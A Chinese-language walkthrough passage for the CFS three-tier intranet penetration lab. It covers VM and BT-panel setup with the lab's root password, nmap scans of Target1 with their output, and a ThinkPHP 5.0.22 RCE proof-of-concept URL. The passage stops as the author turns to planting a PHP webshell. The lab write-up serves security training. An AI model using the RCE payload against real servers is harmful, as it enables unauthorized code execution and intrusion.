CFS三层靶机-内网环境渗透

靶场介绍及环境配置

三个主机的网络环境拓扑图，攻击机的网段在192.168.236.0/24，三台靶机的IP地址分别如图：

上面的 Target1、2、3分别对应CentOS7、Ubuntu、Windows7 三台主机。
(1)网卡配置

注意：在编辑虚拟网卡的时候，不要勾选红圈那个选项，否则后面代理就就没有意义了。.ova文件导入到VM之后可以打开虚拟机，使用root:teamssix.com登录主机，通过ifconfig检查网络情况是否正常。

(2)宝塔配置

其中Target1和Target2主机需要我们自己去宝塔后台配置一下（靶机描述信息里有密码 root:teamssix.com）：
进入宝塔面板，选择网站，再点击网站名，将centos靶机中c段为236的那个ip添加进去，确保能够访问到对应的web页面

Target1

(1)nmap扫描存活主机

1. #扫描段内存活主机
2. ┌──(root㉿kali)-[~]
3. └─# nmap -sP 192.168.236.0/24   
4. Nmap scan report for 192.168.236.141 (192.168.236.141)
5. Host is up (0.00019s latency).
7. #nmap扫描一下 Target1 开放的服务
8. ┌──(root㉿kali)-[~]
9. └─# nmap -A -p 1-65535 192.168.236.141
10. Nmap scan report for 192.168.236.141 (192.168.236.141)
11. Host is up (0.00082s latency).
12. Not shown: 65528 closed tcp ports (reset)
13. PORT     STATE SERVICE VERSION
14. 21/tcp   open  ftp     Pure-FTPd
15. 22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
16. 80/tcp   open  http    nginx
17. 111/tcp  open  rpcbind 2-4 (RPC #100000)
18. 888/tcp  open  http    nginx
19. 3306/tcp open  mysql   MySQL (unauthorized)
20. 8888/tcp open  http    Ajenti http control panel
21. MAC Address: 00:0C:29:61:BA:F8 (VMware)
22. Device type: general purpose
23. Running: Linux 3.X|4.X
24. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
25. OS details: Linux 3.2 - 4.9
26. Network Distance: 1 hop

复制代码

可以看见开放了 21、22、80、111等等端口，我们访问一下80的http服务
访问192.168.236.141 站点不存在，192.168.236.141/index.php 404  是因为宝塔后台配置的原因，按照前面提到的宝塔配置之后就不会出现这个情况。
(2)利用thinkphp-5.0.22 RCE漏洞拿shell

访问80端口开放的http服务

访问后发现这是一个用thinkphp5版本搭建的网站，thinkphp5版本是有漏洞的，这里我们直接上thinkphpGUI工具，检测一下，发现存在ThinkPHP 5.0.22/5.1.29 RCE

1. poc为：http://192.168.236.141/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

复制代码

直接GetShell没通，无伤大雅，那我们执行命令去生成一个一句话木
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！